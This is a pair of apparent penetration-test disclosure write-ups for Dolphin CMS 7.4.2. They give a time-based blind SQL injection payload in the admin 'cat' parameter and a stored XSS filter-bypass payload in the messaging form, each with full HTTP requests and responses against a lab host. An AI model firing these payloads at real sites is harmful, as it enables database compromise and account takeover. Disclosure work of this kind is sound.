Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description

- It was noted that the admin functionality was vulnerable to Blind SQL injection

SQL Injection in Admin Functionality

Steps to Reproduce:

1. Login as admin user and visit the page of "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
2. Add the MySQL injection SLEEP payload to the "cat" value
3. Notice that the backend would delay the HTTP response for 14 miliseconds  

%27%20and%20(select*from(select(sleep(14)))a)--%20

// HTTP GET Request

GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0

[...]

// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510

Friday Fun Pentest Series - 20 - Stored XSS in Messaging Functionality - dolphin.prov7.4.2

Description

- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the doors for potential account takeovers and more advanced attack scenarios

Stored XSS in Messaging Functionality

Steps to Reproduce:

1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
2. Add "Recipient" and "Subject" with random words
3. Add the below mentioned XSS payload that would bypass the XSS filter in the message section
4. Intercept the HTTP POST request and add the payload once again, as it might get filtered (make sure to URL encode the spaces etc)
5. It would trigger once the message has been seen

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1

Host: 192.168.58.170

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0

[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>

// HTTP Response

HTTP/1.1 200 OK

Date: Fri, 21 Mar 2025 17:41:52 GMT

Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40

X-Powered-By: PHP/5.6.40

Content-Length: 455

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

<div class="MsgBox" id="1742578912167">

<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>

<div class="msgbox_content bx-def-font-large bx-def-padding-sec">

Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile.        </div>

</td></tr></table>

</div>